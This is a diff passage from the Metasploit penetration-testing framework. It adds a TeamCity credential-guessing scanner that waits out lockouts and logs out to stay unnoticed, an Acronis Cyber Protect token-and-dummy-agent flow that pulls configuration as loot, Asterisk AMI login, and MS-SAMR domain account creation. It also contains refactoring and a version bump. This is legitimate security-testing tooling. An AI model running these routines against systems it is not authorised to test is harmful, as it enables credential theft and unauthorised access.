+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the TeamCity service' } if res.nil?
+
+          raise ServerNeedsSetupError, 'The server has not performed the initial setup' if res.code == 503
+
+          html_doc = res.get_html_document
+          public_key = html_doc.xpath('//input[@id="publicKey"]/@value').text
+          raise NoPublicKeyError, 'Could not find the TeamCity public key in the HTML document' if public_key.empty?
+
+          { status: :success, proof: public_key }
+        end
+
+        # Create a login request for the provided credentials.
+        # @param [String] username The username to create the login request for.
+        # @param [String] password The password to log in with.
+        # @param [String] public_key The public key to encrypt the password with.
+        # @return [Hash] The login request parameter hash.
+        def create_login_request(username, password, public_key)
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri(@uri.to_s, SUBMIT_PAGE),
+            'ctype' => 'application/x-www-form-urlencoded',
+            'vars_post' => {
+              username: username,
+              remember: true,
+              _remember: '',
+              submitLogin: 'Log in',
+              publicKey: public_key,
+              encryptedPassword: encrypt_data(password, public_key)
+            }
+          }
+        end
+
+        # Try logging in with the provided username, password and public key.
+        # @param [String] username The username to send the login request for.
+        # @param [String] password The user's password.
+        # @param [String] public_key The public key used to encrypt the password.
+        # @return [Hash] A hash with the status and an error or the response.
+        def try_login(username, password, public_key, retry_counter = 0)
+          raise StackLevelTooDeepError, 'try_login stack level too deep!' if retry_counter >= 2
+
+          login_request = create_login_request(username, password, public_key)
+
+          begin
+            res = send_request(login_request)
+          rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error, ::EOFError => e
+            return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to the TeamCity service' } if res.nil?
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: "Received an unexpected status code: #{res.code}" } if res.code != 200
+
+          # Check if the current username is timed out. Sleep if so.
+          # TODO: This can be improved. The `try_login` method should not block until it can retry credentials.
+          # This responsibility should fall onto the caller, and the caller should keep track of the tried, locked out and untried sets of credentials,
+          # and it should be up to the caller and its scheduler algorithm to retry credentials, rather than force this method to block.
+          # Currently, those building blocks are not available, so this is the approach I have implemented.
+          timeout = res.body.match(/login only in (?<timeout>\d+)s/)&.named_captures&.dig('timeout')&.to_i
+          if timeout
+            framework_module.print_status "#{@host}:#{@port} - User '#{username}:#{password}' locked out for #{timeout} seconds. Sleeping, and retrying..." if framework_module
+            sleep(timeout + 1)
+            return try_login(username, password, public_key, retry_counter + 1)
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res } if res.body.match?('Incorrect username or password')
+
+          raise DecryptionError, 'The server failed to decrypt the encrypted password' if res.body.match?('DecryptionFailedException')
+          raise PublicKeyExpiredError, 'The server public key has expired' if res.body.match?('publicKeyExpired')
+
+          # After filtering out known failures, default to retuning the credential as working.
+          # This way, people are more likely to notice any incorrect credential reporting going forward and report them,
+          # the scenarios for which can then be correctly implemented and handled similar to the above.
+          { status: :success, proof: res }
+        end
+
+        # Send a logout request for the provided user's headers.
+        # This header stores the user's cookie.
+        def logout_with_headers(headers)
+          logout_params = {
+            'method' => 'POST',
+            'uri' => normalize_uri(@uri.to_s, LOGOUT_PAGE),
+            'headers' => headers
+          }
+
+          begin
+            send_request(logout_params)
+          rescue Rex::ConnectionError => _e
+            # ignore
+          end
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential:   credential,
+            host:         @host,
+            port:         @port,
+            protocol:     'tcp',
+            service_name: 'teamcity'
+          }
+
+          if @public_key.nil?
+            public_key_result = get_public_key
+            return Result.new(result_options.merge(public_key_result)) if public_key_result[:status] != :success
+
+            @public_key = public_key_result[:proof]
+          end
+
+          login_result = try_login(credential.public, credential.private, @public_key)
+          return Result.new(result_options.merge(login_result)) if login_result[:status] != :success
+
+          # Ensure we log the user out, so that our logged in session does not appear under the user's profile.
+          logout_with_headers(login_result[:proof].headers)
+
+          result_options[:status] = ::Metasploit::Model::Login::Status::SUCCESSFUL
+          Result.new(result_options)
+        end
+
+        private
+
+        attr_accessor :public_key
+
+      end
+    end
+  end
+end
@@ -16,7 +16,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
        options.console.plugins = []
        options.console.quiet = false
        options.console.readline = true
-        options.console.real_readline = false
        options.console.resources = []
        options.console.subcommand = :run
      }
@@ -54,7 +53,10 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
        end

        option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do
-          options.console.real_readline = true
+          message = "The RealReadline option has been marked as deprecated, and is currently a noop.\n"
+          message << "If you require this functionality, please use the following link to tell us:\n"
+          message << '  https://github.com/rapid7/metasploit-framework/issues/19399'
+          warn message
        end

        option_parser.on('-o', '--output FILE', 'Output to the specified file') do |file|
@@ -13,7 +13,6 @@ class Metasploit::Framework::ParsedOptions::RemoteDB < Metasploit::Framework::Pa
        options.console.local_output = nil
        options.console.plugins = []
        options.console.quiet = false
-        options.console.real_readline = false
        options.console.resources = []
        options.console.subcommand = :run
      }
@@ -73,13 +73,24 @@ module Metasploit
                # esxi 6.7
              elsif info =~ /sh: id: not found/
                info = ssh_socket.exec!("vmware -v\n").to_s
+                # vcenter 6.7 (photon)
+                # VMware vCenter Server 8.0.0.10000
+                # VMware VirtualCenter 6.7.0 build-19299595
+              elsif info =~ /Unknown command: `id'/
+                # eventually we'll want to try to shell in via 'shell'. On failure you see: "User 'user_operator' is not authorized to run this command"
+                # on succeess: "Shell access is granted to <username>"
+                info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s
+                /Product:\s+(?<product>.+)$/ =~ info
+                /Version:\s+(?<version>[\d\.]+)$/ =~ info
+                if version && product
+                  info = "#{product.strip} #{version.strip}"
+                end
              else
                info << ssh_socket.exec!("help\n?\n\n\n").to_s
              end
            end
          rescue Timeout::Error
          end
-
          info
        end

@@ -113,6 +124,8 @@ module Metasploit
            'mikrotik'
          when /Arista/i
            'arista'
+          when /VMware vCenter Server/i
+            'vcenter'
          else
            'unknown'
          end
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.35"
+      VERSION = "6.4.41"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -76,7 +76,7 @@ module Msf::Sessions
    end

    def bootstrap(datastore = {}, handler = nil)
-      @ssh_command_stream = Net::SSH::CommandStream.new(ssh_connection)
+      @ssh_command_stream = Net::SSH::CommandStream.new(ssh_connection, session: self, logger: self)

      @ssh_command_stream.verify_channel
      # set remote_window_size to 32 which seems to help stability
@@ -243,7 +243,7 @@ module Msf::Sessions
      # shells accessed through SSH may respond to the echo command issued for verification as expected
      datastore['AutoVerifySession'] &= @platform.blank?

-      @rstream = Net::SSH::CommandStream.new(ssh_connection).lsock
+      @rstream = Net::SSH::CommandStream.new(ssh_connection, session: self, logger: self).lsock
      super

      @info = "SSH #{username} @ #{@peer_info}"
@@ -39,6 +39,31 @@ module Msf
        result
      end

+      # Take credentials hash and check data for username and password and then returns a hash for those values
+      #
+      # @param [Hash] credential_data
+      # @return [Hash]
+      def login_credentials(credential_data)
+        # If the database is active and core is populated then grab the creds from there, otherwise
+        # fallback and check in credentials data's top layer
+        if framework.db&.active && credential_data[:core]
+          {
+            public: credential_data[:core].public,
+            private_data: credential_data[:core].private
+          }
+        elsif credential_data[:username] && credential_data[:private_data]
+          {
+            public: credential_data[:username],
+            private_data: credential_data[:private_data]
+          }
+        else
+          {
+            public: 'credentials could not be reported',
+            private_data: 'credentials could not be reported'
+          }
+        end
+      end
+
      # Creates a credential and adds to to the DB if one is present
      #
      # @param [Hash] credential_data
@@ -46,12 +71,8 @@ module Msf
      def create_credential_login(credential_data)
        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report

-        credential = {
-          public: credential_data[:username],
-          private_data: credential_data[:private_data]
-        }
        @report[rhost] = { successful_logins: [] }
-        @report[rhost][:successful_logins] << credential
+        @report[rhost][:successful_logins] << login_credentials(credential_data)
        super
      end

@@ -69,12 +90,8 @@ module Msf
      def create_credential_and_login(credential_data)
        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report

-        credential = {
-          public: credential_data[:username],
-          private_data: credential_data[:private_data]
-        }
        @report[rhost] = { successful_logins: [] }
-        @report[rhost][:successful_logins] << credential
+        @report[rhost][:successful_logins] << login_credentials(credential_data)
        super
      end

@@ -82,6 +82,8 @@ CONFIG_CHANGES    = 'config-changes'
 IOC_IN_LOGS       = 'ioc-in-logs'
 # Module may cause account lockouts (likely due to brute-forcing).
 ACCOUNT_LOCKOUTS  = 'account-lockouts'
+# Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions).
+ACCOUNT_LOGOUT    = 'account-logout'
 # Module may show something on the screen (Example: a window pops up).
 SCREEN_EFFECTS    = 'screen-effects'
 # Module may cause a noise (Examples: audio output from the speakers or hardware beeps).
@@ -23,33 +23,22 @@ module Msf::DBManager::Migration
  # @see ActiveRecord::MigrationContext.migrate
  def migrate(config=nil, verbose=false)
    ran = []
-    # Rails 5 changes ActiveRecord parents means to migrate outside
-    # the `rake` task framework has to dig a little lower into ActiveRecord
-    # to set up the DB connection capable of interacting with migration.
-    previouslyConnected = ActiveRecord::Base.connected?
-    unless previouslyConnected
-      ApplicationRecord.remove_connection
-      ActiveRecord::Base.establish_connection(config)
-    end
+
    ActiveRecord::Migration.verbose = verbose
    ActiveRecord::Base.connection_pool.with_connection do
      begin
-        context = default_migration_context
-        if needs_migration?(context)
-          ran = context.migrate
+        with_migration_context do |context|
+          if context.needs_migration?
+            ran = context.migrate
+          end
        end
-          # ActiveRecord::Migrator#migrate rescues all errors and re-raises them
-          # as StandardError
+      # ActiveRecord::Migrator#migrate rescues all errors and re-raises them as StandardError
      rescue StandardError => error
        self.error = error
        elog('DB.migrate threw an exception', error: error)
      end
    end

-    unless previouslyConnected
-      ActiveRecord::Base.remove_connection
-      ApplicationRecord.establish_connection(config)
-    end
    # Since the connections that existed before the migrations ran could
    # have outdated column information, reset column information for all
    # ApplicationRecord descendents to prevent missing method errors for
@@ -57,15 +46,14 @@ module Msf::DBManager::Migration
    # information was cached.
    reset_column_information

-    return ran
+    ran
  end

  # Determine if the currently established database connection needs migration
  #
-  # @param [ActiveRecord::MigrationContext,snil] context The migration context to check. Will default if not supplied
  # @return [Boolean] True if migration is required, false otherwise
-  def needs_migration?(context = default_migration_context)
-    ActiveRecord::Base.connection_pool.with_connection do
+  def needs_migration?
+    with_migration_context do |context|
      return context.needs_migration?
    end
  end
@@ -77,6 +65,10 @@ module Msf::DBManager::Migration

  private

+  def with_migration_context
+    yield ActiveRecord::MigrationContext.new(gather_engine_migration_paths)
+  end
+
  # @return [ActiveRecord::MigrationContext]
  def default_migration_context
    ActiveRecord::MigrationContext.new(gather_engine_migration_paths, ActiveRecord::SchemaMigration)
@@ -28,7 +28,7 @@ module Msf::DBManager::ModuleCache
    values.collect { |value| "%#{value}%" }
  end

-  def module_to_details_hash(m)
+  def module_to_details_hash(m, with_mixins: true)
    res  = {}
    bits = []

@@ -92,8 +92,10 @@ module Msf::DBManager::ModuleCache
      res[:stance] = m.stance.to_s.index("aggressive") ? "aggressive" : "passive"


-      m.class.mixins.each do |x|
-         bits << [ :mixin, { :name => x.to_s } ]
+      if with_mixins
+        m.class.mixins.each do |x|
+           bits << [ :mixin, { :name => x.to_s } ]
+        end
      end
    end

@@ -269,7 +271,6 @@ module Msf::DBManager::ModuleCache
      }

      Mdm::Module::Detail.find_each do |md|
-
        unless md.ready
          refresh << md
          next
@@ -291,6 +292,7 @@ module Msf::DBManager::ModuleCache

      refresh.each { |md| md.destroy }

+      new_modules = []
      [
          ['exploit', framework.exploits],
          ['auxiliary', framework.auxiliary],
@@ -305,14 +307,12 @@ module Msf::DBManager::ModuleCache
          next if skip_reference_name_set.include? mn
          obj = mt[1].create(mn)
          next if not obj
-          begin
-            update_module_details(obj)
-          rescue ::Exception => e
-            elog("Error updating module details for #{obj.fullname}", error: e)
-          end
+          new_modules <<= obj
        end
      end

+      insert_all(new_modules)
+
      self.framework.cache_initialized = true
    end

@@ -332,7 +332,7 @@ module Msf::DBManager::ModuleCache
    return if not self.migrated

    ApplicationRecord.connection_pool.with_connection do
-      info = module_to_details_hash(module_instance)
+      info = module_to_details_hash(module_instance, with_mixins: false)
      bits = info.delete(:bits) || []
      module_detail = Mdm::Module::Detail.create!(info)

@@ -359,4 +359,62 @@ module Msf::DBManager::ModuleCache
      module_detail.save!
    end
  end
+
+  private
+
+  # Insert the Msf::Module array into the Mdm::Module::Detail database class
+  #
+  # @param [Array<Msf::Module>] modules
+  def insert_all(modules)
+    module_hashes = modules.filter_map do |mod|
+      begin
+        hash = module_to_details_hash(mod, with_mixins: false)
+        # The insert_all API requires all hashes to have the same keys present, so explicitly set these potentially missing keys
+        hash[:disclosure_date] ||= nil
+        hash[:default_target] ||= nil
+        hash[:default_action] ||= nil
+        hash[:stance] ||= nil
+        hash
+      rescue ::Exception => e
+        elog("Error updating module details for #{mod.fullname}", error: e)
+        nil
+      end
+    end
+    return if module_hashes.empty?
+
+    # 1) Bulk insert the module detail entries
+    module_details = module_hashes.map { |mod_hash| mod_hash.except(:bits) }
+    module_detail_ids = Mdm::Module::Detail.insert_all!(module_details, returning: %w[id]).map { |returning| returning['id'] }
+
+    # 2) Build the hashes for the associations
+    associations = module_hashes.zip(module_detail_ids).each_with_object(Hash.new { |hash, key| hash[key] = [] }) do |(module_hash, detail_id), acc|
+      module_hash[:bits].each do |args|
+        otype, vals = args
+
+        case otype
+        when :action
+          acc[Mdm::Module::Action] << { detail_id: detail_id, name: vals[:name] }
+        when :arch
+          acc[Mdm::Module::Arch] << { detail_id: detail_id, name: vals[:name] }
+        when :author
+          acc[Mdm::Module::Author] << { detail_id: detail_id, name: vals[:name], email: vals[:email] }
+        when :platform
+          acc[Mdm::Module::Platform] << { detail_id: detail_id, name: vals[:name] }
+        when :ref
+          acc[Mdm::Module::Ref] << { detail_id: detail_id, name: vals[:name] }
+        when :target
+          acc[Mdm::Module::Target] << { detail_id: detail_id, index: vals[:index], name: vals[:name] }
+        end
+      end
+    end
+
+    # 3) Insert all of the associations
+    associations.each do |association_clazz, entries|
+      next if entries.empty?
+
+      association_clazz.insert_all!(entries)
+    end
+
+    nil
+  end
 end
@@ -0,0 +1,126 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Remote::Asterisk
+    include Msf::Exploit::Remote::Tcp
+    include Msf::Auxiliary::Report
+
+    def initialize(info = {})
+      super
+
+      register_options(
+        [
+          Opt::RPORT(5038),
+          OptString.new('USERNAME', [true, 'The username for Asterisk Access', '']),
+          OptString.new('PASSWORD', [true, 'The password for the specified username', '']),
+        ], self.class
+      )
+    end
+
+    #
+    # Handler for sending AMI commands
+    #
+    # @param cmd [String] command to send
+    #
+    # @return [String] response from the server
+    def send_command(cmd = '')
+      sock.put cmd
+
+      res = ''
+      timeout = 15
+      Timeout.timeout(timeout) do
+        res << sock.get_once while res !~ /\r?\n\r?\n/
+      end
+
+      res
+    rescue Timeout::Error
+      print_error "Timeout (#{timeout} seconds)"
+    rescue StandardError => e
+      print_error e.message
+    end
+
+    #
+    # Attempt to get the asterisk version number
+    #
+    #
+    # @return [Gem::Version] version response from the server. False on error
+    def get_asterisk_version
+      vprint_status 'Checking Asterisk version'
+
+      req = "action: command\r\n"
+      req << "command: core show version\r\n"
+      req << "\r\n"
+      res = send_command req
+
+      return false if res =~ /Response: Error/
+
+      # example output
+      # Response: Success
+      # Message: Command output follows
+      # Output: Asterisk 19.8.0 built by mockbuild @ jenkins7 on a x86_64 running Linux on 2023-01-16 07:07:49 UTC
+
+      # https://rubular.com/r/e2LvocVBeKaiVo
+      if res =~ /^Output: Asterisk (.*?) built/
+        return ::Regexp.last_match(1)
+      end
+
+      false
+    end
+
+    #
+    # Handler for logging in to AMI
+    #
+    # @param username [String] username of the user
+    # @param password [String] password of the user
+    #
+    # @return [Boolean] true on success, false on failure
+    def login(username, password)
+      vprint_status "Authenticating as '#{username}'"
+
+      req = "action: login\r\n"
+      req << "username: #{username}\r\n"
+      req << "secret: #{password}\r\n"
+      req << "events: off\r\n"
+      req << "\r\n"
+      res = send_command req
+
+      return false unless res =~ /Response: Success/
+
+      report_cred user: username,
+                  password: password,
+                  proof: 'Response: Success'
+
+      report_service host: rhost,
+                     port: rport,
+                     proto: 'tcp',
+                     name: 'asterisk'
+      true
+    end
+
+    def report_cred(opts)
+      service_data = {
+        address: rhost,
+        port: rport,
+        service_name: 'asterisk_manager',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :service,
+        module_fullname: fullname,
+        username: opts[:username],
+        private_data: opts[:password],
+        private_type: :password
+      }.merge service_data
+
+      login_data = {
+        core: create_credential(credential_data),
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        proof: opts[:proof]
+      }.merge service_data
+
+      create_credential_login login_data
+    end
+  end
+end
@@ -0,0 +1,148 @@
+# -*- coding: binary -*-
+
+# This mixin module provides provides a way of interacting with Acronis Cyber 15 and Backup 12.5 installations
+
+module Msf::Exploit::Remote::HTTP::AcronisCyber
+  include Msf::Exploit::Remote::HttpClient
+
+  # get the first access_token
+  # @return [access_token, nil] returns first access_token or nil if not successful
+  def get_access_token1
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'idp', 'token'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'grant_type' => 'password',
+        'username' => nil,
+        'password' => nil
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('access_token')
+
+    # parse json response and return access_token
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['access_token']
+  end
+
+  # register a dummy agent in Acronis Cyber Protect 12.5 and 15.0
+  # @param [client_id] random generated uuid
+  # @param [access_token1] first access_token
+  # @return [client_secret, nil] returns client_secret or nil if not successful
+  def dummy_agent_registration(client_id, access_token1)
+    name = Rex::Text.rand_text_alphanumeric(5..8).downcase
+    post_data = {
+      client_id: client_id.to_s,
+      data: { agent_type: 'backupAgent', hostname: name.to_s, is_transient: true },
+      tenant_id: nil,
+      token_endpoint_auth_method: 'client_secret_basic',
+      type: 'agent'
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'account_server', 'v2', 'clients'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{access_token1}"
+      },
+      'data' => post_data.to_s
+    })
+    return unless res&.code == 201 && res.body.include?('client_id') && res.body.include?('client_secret')
+
+    # parse json response and return client_secret
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['client_secret']
+  end
+
+  # get second access_token which is valid for 30 days
+  # @param [client_id] random generated uuid
+  # @param [client_secret] client_secret retrieved from a successful agent registration
+  # @return [access_token, nil] returns first access_token or nil if not successful
+  def get_access_token2(client_id, client_secret)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'idp', 'token'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'grant_type' => 'client_credentials',
+        'client_id' => client_id.to_s,
+        'client_secret' => client_secret.to_s
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('access_token')
+
+    # parse json response and return access_token
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['access_token']
+  end
+
+  # returns version information
+  # @param [access_token2] second access_token
+  # @return [version, nil] returns version  or nil if not successful
+  def get_version_info(access_token2)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'versions'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{access_token2}"
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('backendVersion')
+
+    # parse json response and get the relevant machine info
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['backendVersion']
+  end
+
+  # return all configured items in json format
+  # @param [access_token2] second access_token
+  # @return [res_json, nil] returns machine info in json format or nil if not successful
+  def get_machine_info(access_token2)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'resources'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Authorization' => "bearer #{access_token2}"
+      },
+      'vars_get' => {
+        'embed' => 'details'
+      }
+    })
+    return unless res&.code == 200
+    return unless res.body.include?('items') || res.body.include?('data')
+
+    if datastore['OUTPUT'] == 'json'
+      loot_path = store_loot('acronis.cyber.protect.config', 'application/json', datastore['RHOSTS'], res.body, 'configuration', 'endpoint configuration')
+      print_good("Configuration details are successfully saved in json format to #{loot_path}")
+    end
+
+    # parse json response and get the relevant machine info
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json
+  end
+end
@@ -63,4 +63,19 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users
    end
  end

+  # Performs a password reset for a user
+  #
+  # @param user [String] Username
+  # @return [Boolean] true if the request was successful
+  def reset_user_password(user)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => wordpress_url_login,
+      'vars_get' => { 'action' => 'lostpassword' },
+      'vars_post' => { 'user_login' => user, 'redirect_to' => '', 'wp-submit' => 'Get New Password' }
+    })
+    return false unless res&.code == 200
+
+    true
+  end
 end
@@ -499,7 +499,11 @@ module Exploit::Remote::HttpClient
    end

    # Don't forget any GET parameters
-    opts['query'] ||= location.query if location.query
+    if location.query
+      opts['query'] = location.query
+    else
+      opts['query'] = ''
+    end
  end

  #
@@ -9,6 +9,8 @@ module Msf::Exploit::Remote::Kerberos::Ticket::Storage
      available_tickets = tickets(options).select do |ticket|
        !ticket.expired?(now)
      end
+      return unless available_tickets.any?
+
      if options[:offered_etypes].present?
        # Prefer etypes mentioned first
        options[:offered_etypes].each do |etype|
@@ -285,6 +285,8 @@ module Msf
        fail_with(Msf::Module::Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
      when 18
        fail_with(Msf::Module::Failure::BadConfig, 'The LDAP search failed because some matching is not supported for the target attribute type!')
+      when 19
+        fail_with(Msf::Module::Failure::BadConfig, 'A constraint on the operation was not satisfied')
      when 32
        fail_with(Msf::Module::Failure::UnexpectedReply, 'The LDAP search failed because the operation targeted an entity within the base DN that does not exist.')
      when 33
@@ -5,7 +5,8 @@
 #
 # -*- coding: binary -*-

-require 'windows_error/h_result'
+require 'windows_error'
+require 'rex/proto/x509/request'

 module Msf

@@ -255,48 +256,40 @@ module Exploit::Remote::MsIcpr
  # @param [Array<String>] application_policies OIDs to add as application policies.
  # @return [OpenSSL::X509::Request] The request object.
  def build_csr(cn:, private_key:, dns: nil, msext_sid: nil, msext_upn: nil, algorithm: 'SHA256', application_policies: [])
-    request = OpenSSL::X509::Request.new
-    request.version = 1
-    request.subject = OpenSSL::X509::Name.new([
-      ['CN', cn, OpenSSL::ASN1::UTF8STRING]
-    ])
-    request.public_key = private_key.public_key
+    Rex::Proto::X509::Request.create_csr(private_key, cn, algorithm) do |request|
+      extensions = []

-    extensions = []
+      subject_alt_names = []
+      subject_alt_names << "DNS:#{dns}" if dns
+      subject_alt_names << "otherName:#{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
+      unless subject_alt_names.empty?
+        extensions << OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
+      end

-    subject_alt_names = []
-    subject_alt_names << "DNS:#{dns}" if dns
-    subject_alt_names << "otherName:#{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
-    unless subject_alt_names.empty?
-      extensions << OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
-    end
+      if msext_sid
+        ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.new(OtherName: {
+          type_id: OID_NTDS_OBJECTSID,
+          value: msext_sid
+        })
+        extensions << OpenSSL::X509::Extension.new(OID_NTDS_CA_SECURITY_EXT, ntds_ca_security_ext.to_der, false)
+      end

-    if msext_sid
-      ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.new(OtherName: {
-        type_id: OID_NTDS_OBJECTSID,
-        value: msext_sid
-      })
-      extensions << OpenSSL::X509::Extension.new(OID_NTDS_CA_SECURITY_EXT, ntds_ca_security_ext.to_der, false)
-    end
-
-    unless application_policies.blank?
-      application_cert_policies = Rex::Proto::CryptoAsn1::X509::CertificatePolicies.new(
-        certificatePolicies: application_policies.map { |policy_oid| Rex::Proto::CryptoAsn1::X509::PolicyInformation.new(policyIdentifier: policy_oid) }
-      )
-      extensions << OpenSSL::X509::Extension.new(OID_APPLICATION_CERT_POLICIES, application_cert_policies.to_der, false)
-    end
-
-    unless extensions.empty?
-      request.add_attribute(OpenSSL::X509::Attribute.new(
-        'extReq',
-        OpenSSL::ASN1::Set.new(
-          [OpenSSL::ASN1::Sequence.new(extensions)]
+      unless application_policies.blank?
+        application_cert_policies = Rex::Proto::CryptoAsn1::X509::CertificatePolicies.new(
+          certificatePolicies: application_policies.map { |policy_oid| Rex::Proto::CryptoAsn1::X509::PolicyInformation.new(policyIdentifier: policy_oid) }
        )
-      ))
-    end
+        extensions << OpenSSL::X509::Extension.new(OID_APPLICATION_CERT_POLICIES, application_cert_policies.to_der, false)
+      end

-    request.sign(private_key, OpenSSL::Digest.new(algorithm))
-    request
+      unless extensions.empty?
+        request.add_attribute(OpenSSL::X509::Attribute.new(
+          'extReq',
+          OpenSSL::ASN1::Set.new(
+            [OpenSSL::ASN1::Sequence.new(extensions)]
+          )
+        ))
+      end
+    end
  end

  # Make a certificate request on behalf of another user.
@@ -0,0 +1,225 @@
+###
+#
+# This mixin provides methods to add, delete and lookup accounts via MS-SAMR
+#
+# -*- coding: binary -*-
+
+module Msf
+
+module Exploit::Remote::MsSamr::Account
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::MsSamr
+
+  AccountInfo = Struct.new(:name, :password)
+
+  def initialize(info = {})
+    super
+
+    register_options([
+      OptString.new('ACCOUNT_NAME', [ false, 'The account name' ]),
+      OptString.new('ACCOUNT_PASSWORD', [ false, 'The password for the new account' ]),
+    ], Msf::Exploit::Remote::MsSamr)
+  end
+
+  def generate_unused_computer_name(samr_con)
+    computer_name = random_hostname
+    4.downto(0) do |attempt|
+      break if samr_con.samr.samr_lookup_names_in_domain(
+        domain_handle: samr_con.domain_handle,
+        names: [ computer_name ]
+      ).nil?
+
+      computer_name = random_hostname
+      raise MsSamrBadConfigError, 'Could not find an unused computer name.' if attempt == 0
+    end
+
+    computer_name
+  end
+
+  def validate_name_doesnt_exist(samr_con, name)
+    if samr_con.samr.samr_lookup_names_in_domain(domain_handle: samr_con.domain_handle, names: [ name ])
+      raise MsSamrBadConfigError, 'The specified name already exists.'
+    end
+  end
+
+  # Add a new account (computer or user)
+  # @param account_type [Symbol] The type (:computer or :user) of account to create
+  def add_account(account_type, opts = {})
+    raise MsSamrBadConfigError, 'Must specify computer or user account' unless [:computer, :user].include?(account_type)
+
+    tree = opts[:tree] || connect_ipc
+
+    samr_con = connect_samr(tree)
+
+    account_name = opts[:account_name] || datastore['ACCOUNT_NAME']
+    if account_name.blank?
+      if account_type == :computer
+        account_name = generate_unused_computer_name(samr_con)
+      else
+        raise MsSamrBadConfigError, 'Must provide a user name'
+      end
+    else
+      validate_name_doesnt_exist(samr_con, account_name)
+    end
+
+    account_password = opts[:account_password] || datastore['ACCOUNT_PASSWORD']
+    if account_password.blank?
+      account_password = Rex::Text.rand_text_alphanumeric(32)
+    end
+
+    uac = account_type == :computer ? RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT : RubySMB::Dcerpc::Samr::USER_NORMAL_ACCOUNT
+
+    result = samr_con.samr.samr_create_user2_in_domain(
+      domain_handle: samr_con.domain_handle,
+      name: account_name,
+      account_type: uac,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    password_expired = (account_type == :computer) ? 1 : 0
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: password_expired,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED,
+        },
+        user_password: {
